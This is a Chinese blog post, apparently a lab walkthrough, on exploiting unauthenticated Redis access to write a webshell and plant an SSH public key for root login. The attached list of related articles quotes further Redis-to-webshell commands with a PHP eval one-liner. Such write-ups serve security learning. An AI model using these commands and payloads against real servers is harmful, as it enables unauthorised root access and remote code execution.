web中间件漏洞-Redis漏洞未授权访问漏洞-写webshell、写ssh公钥

最新推荐文章于 2024-08-24 23:04:39 发布
最新推荐文章于 2024-08-24 23:04:39 发布
阅读量451 收藏 5
点赞数 10
分类专栏: 0803实操-Web中间件漏洞 文章标签: 中间件 redis ssh
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/139887468
版权

web中间件漏洞-Redis漏洞未授权访问漏洞

利用redis未授权访问漏洞写webshell

利用redis未授权访问、攻击机向服务器写入webshell
在这里插入图片描述
从服务器查看写入的webshell
在这里插入图片描述
菜刀连接
在这里插入图片描述

利用redis未授权访问漏洞写ssh公钥

kali生成rsa公私钥对
ssh-keygen -t rsa
在这里插入图片描述
将公钥id_rsa.pub写入文件bar.txt中,将bar.txt上传到远程服务器,完整的命令如下:catbar.txt|redis-cli-h192.168.1.2-xsetkali;首先读取出了bar.txt中存放的公钥。-x的官方解释是从标准输入中得到值作为最后一个参数,-x即ReadlastargumentfromSTDIN。命令相当于远程连接到redis服务器之后,执行setkali【bat.txt的内容】,kali是key,公钥内容是value。保存认证密钥,通过Redis-CLI远程管理,设置Redis的默认路径以及数据库缓存文件名,默认情况下ssh服务读取用户家目录下的.ssh文件夹中的公钥对连接的用户进行验证。这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authorized_keys文件里。
保存认证密钥,通过Redis-CLI远程管理,设置Redis的默认路径以及数据库缓存文件名,默认情况下ssh服务读取用户家目录下的.ssh文件夹中的公钥对连接的用户进行验证。这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authorized_keys文件里。
在这里插入图片描述
使用本机私钥免密连接服务器,执行ssh-iid_rsaroot@192.168.1.2
在这里插入图片描述

Alsn86
关注
专栏目录
授权访问Redis授权访问漏洞
qq_68163788的博客
05-08 1117
授权访问是指在Redis数据库中,经过身份验证或授权的情况下访问数据库的行为。Redis是一种流行的开源内存数据库,用于存储数据并提供快速访问。如果Redis实例经过适当的安全配置,攻击者可以利用这一漏洞访问敏感数据,修改数据或甚至破坏数据库。授权访问可能导致数据泄露、数据损坏和系统崩溃等严重后果。为了防止授权访问,管理员应该采取必要的安全措施,例如设置访问控制列表、使用密码进行身份验证和定期更新Redis的安全配置。通过加强安全措施,可以有效防止授权访问Redis数据库造成的风险。
利用rediswebshell
八月的专栏
03-13 1388
redis和mongodb我之所见 最近自己在做一些个人的小创作、小项目,其中用到了mongodb和redis,最初可能对这二者没有深入的认识。 都是所谓的“非关系型数据库”,有什么区别么? 实际上,在我看来,redis的角色更接近于memcache,而mongodb是一个真正的数据库。 redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,比memca
SSRF 302跳转攻击redisssh公钥实现远程登录
最新发布
m0_70638961的博客
08-24 404
ssh -i id_rsa root@IP地址登录成功。
rediswebshell
干铮的博客
01-31 804
利用rediswebshell kali@ToolsScannerKali20201:~$ redis-cli -h 192.168.3.28 192.168.3.28:6379> config set dir /usr/local/nginx/html OK 192.168.3.28:6379> config set dbfilename shell.php OK 192.168.3.28:6379> set x "<?php @eval($_REQUEST[123])?&g
Rediswebshell
weixin_54227009的博客
06-06 688
如果网站上开了权限的话,redis连上,可以直接个一句话命令如下:config set dit /var/www/htmlconfig set dbfilename shell.phpset x ""save我这里dir有问题,所以就没实操了
Redis授权访问漏洞的利用
L18296069161的博客
12-16 216
渗透学习交流群:773617250,群内定期直播,发布相关教程,欢迎咨询群主学习交流!  利用rediswebshell  在redis-cli中入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save  然后看一下...
六、利用rediswebshell
dahege666的博客
03-02 943
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 服务器配置phpstudy ,截图略过 1. 下载Phpstudy for Linux的bin文件 操作命令: wget -c http://lamp.phpstudy.net/phpstudy.bin 2. 配置phpstudy.bin文件的可执...
中间件框架漏洞-Readis授权访问漏洞
m0_69555575的博客
09-25 444
redis授权访问漏洞总结
Redis授权访问漏洞复现
Armandhe的博客
06-01 1156
redis授权访问漏洞的复现、利用条件、防御措施、
Redis授权访问漏洞介绍及修复方案
YF_Li123的博客
03-25 2261
Redis 漏洞介绍 1. 什么是Redis授权访问漏洞 Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下会被攻击者利用,比如添加防火墙规则来避免其他非信任IP访问等。 2.有哪些危害 攻击者利用 Redis 授权访问漏洞读取 Redis 数据库中的数据,可能导致敏感信息泄露或恶意执行 flushall...
Redis 授权访问引发的安全问题
weixin_45253622的博客
12-23 3654
Redis Redis是一个开源的使用ANSI C语言编、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 默认端口:6379 安全问题 Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘
授权访问漏洞总结
墨鱼菜鸡
07-28 332
目录 一、MongoDB 授权访问漏洞 二、Redis 授权访问漏洞 三、Memcached 授权访问漏洞CVE-2013-7239 四、JBOSS 授权访问漏洞 五、VNC 授权访问漏洞 六、Docker 授权访问漏洞 七、ZooKeeper 授权访问漏洞 八、Rsync ...
Redis 授权访问 webshell记录
qq_38053759的博客
04-08 945
Redis 授权访问 webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
redis授权访问--拿webshell以及实现ssh免密登录
Xiaolisec的博客
08-30 778
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
SSRF+rediswebshell
qq_43665434的博客
04-03 1670
晓看红湿处,花重锦官城。 实验环境 主机 角色 描述 centos 受害服务器 运行redisweb服务(redis授权访问) window 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf和redis授权访问webshell 实验准备 思路: 构造redis数据包,利用redis的数据备份功能,将webshell入目标服务器(centos)的网站根目录下,然后用菜刀连接获取shell。 条件: 1、运行redis服务的用户必须具有在网站根目录下
利用网站拿到服务器登录权限,利用RedisSSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2741
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt入靶机Redi...
Xshell工具利用Redis 6379SSH公钥漏洞
maple_leaf
05-03 537
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值